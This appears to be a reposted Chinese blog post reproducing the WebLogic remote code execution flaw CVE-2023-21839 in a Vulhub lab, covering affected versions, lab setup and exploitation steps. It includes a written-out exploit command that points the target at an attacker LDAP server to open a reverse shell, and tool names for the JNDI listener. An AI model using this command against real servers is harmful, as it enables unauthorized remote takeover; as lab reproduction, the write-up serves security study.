当前位置:   article > 正文

【漏洞复现】Weblogic CVE-2023-21839

cve-2023-21839

一、漏洞简介

1. 产品简介

WebLogic是Oracle公司研发的用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器,在全球范围内被广泛使用。

2. 漏洞简介

Oracle发布安全公告,修复了一个存在于WebLogic Core中的远程代码执行漏洞(CVE-2023-21839),可在未经身份验证的情况下通过T3、IIOP协议远程访问并破坏易受攻击的WebLogic Server,成功利用该漏洞可能导致未授权访问和敏感信息泄露。

3. 危害等级

高危

4. 影响范围

Oracle Weblogic Server 12.2.1.3.0

Oracle Weblogic Server 12.2.1.4.0

Oracle Weblogic Server 14.1.1.0.0

二、复现环境

靶机(搭建的Vulhub漏洞测试靶场):192.168.15.15
攻击机(kali):192.168.15.131
Vulhub漏洞测试靶场的搭建可参考:Vulhub漏洞测试靶场搭建

三、复现过程

1. 启动漏洞环境

使用Vulhub启动漏洞环境

在这里插入图片描述

2. 验证漏洞环境

访问链接:http://192.168.15.15:7001/console/login/LoginForm.jsp 即可访问到后台管理登录界面,出现以下界面证明环境搭建成功。

在这里插入图片描述

3. 漏洞复现

用到的两个工具:JNDIExploit-1.2-SNAPSHOT.jarCVE-2023-21839

第一步:使用工具JNDIExploit-1.2-SNAPSHOT.jar在kali上设置监听:
在这里插入图片描述
第二步:打开kali监听端口
在这里插入图片描述
第三步:使用CVE-2023-21839工具来进行攻击测试(将工具上传至kali进行编译,然后再执行)

cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 192.168.15.15 -port 7001 -ldap ldap://192.168.15.131:1389/Basic/ReverseShell/192.168.15.131/6666
  • 1
  • 2
  • 3

在这里插入图片描述

第一次执行报错 提示 Exception in thread "LDAPListener client connection reader for connection from 的错误。解决方法:需要去下载对应服务器版本的java的版本。

在这里插入图片描述

安装jdk1.8.0.202后再次执行(不知道如何安装java的可以参考:java安装步骤

在这里插入图片描述

第四步:成功反弹shell

在这里插入图片描述
在这里插入图片描述

最后一步:复现之后别忘记及时关闭漏洞环境

在这里插入图片描述

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/从前慢现在也慢/article/detail/933276
推荐阅读
相关标签
  

闽ICP备14008679号